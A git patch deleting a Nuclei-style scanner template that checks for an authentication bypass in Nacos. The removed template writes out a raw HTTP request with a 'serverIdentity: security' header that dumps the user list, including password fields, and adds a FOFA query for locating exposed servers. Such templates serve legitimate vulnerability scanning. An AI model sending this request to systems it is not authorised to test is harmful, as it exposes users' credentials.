From 4302231285c68e38da012a9e9fa0ea9e24529ae1 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Tue, 22 Aug 2023 13:25:06 +0530
Subject: [PATCH] Delete nacos-auth-bypass.yaml

---
 .../other/nacos-auth-bypass.yaml              | 42 -------------------
 1 file changed, 42 deletions(-)
 delete mode 100644 http/vulnerabilities/other/nacos-auth-bypass.yaml

diff --git a/http/vulnerabilities/other/nacos-auth-bypass.yaml b/http/vulnerabilities/other/nacos-auth-bypass.yaml
deleted file mode 100644
index 596e0fd678..0000000000
--- a/http/vulnerabilities/other/nacos-auth-bypass.yaml
+++ /dev/null
@@ -1,42 +0,0 @@
-id: nacos-auth-bypass
-
-info:
-  name: Nacos - Authentication Bypass
-  author: SleepingBag945
-  severity: high
-  description: |
-    When analyzing the authentication verification process of Nacos, it is found that there are various default authentication methods. By default, various methods can be used to bypass authorization authentication.
-  reference:
-    - https://zhuanlan.zhihu.com/p/602021283
-  metadata:
-    max-request: 1
-    verified: true
-    fofa-query: app="NACOS"
-  tags: nacos,auth-bypass
-
-http:
-  - raw:
-      - |
-        GET /v1/auth/users?pageNo=1&pageSize=9&search=blur HTTP/1.1
-        Host: {{Hostname}}
-        serverIdentity: security
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - '"totalCount":'
-          - '"username":'
-          - '"password":'
-          - '"pagesAvailable":'
-        condition: and
-
-      - type: word
-        part: header
-        words:
-          - application/json
-
-      - type: status
-        status:
-          - 200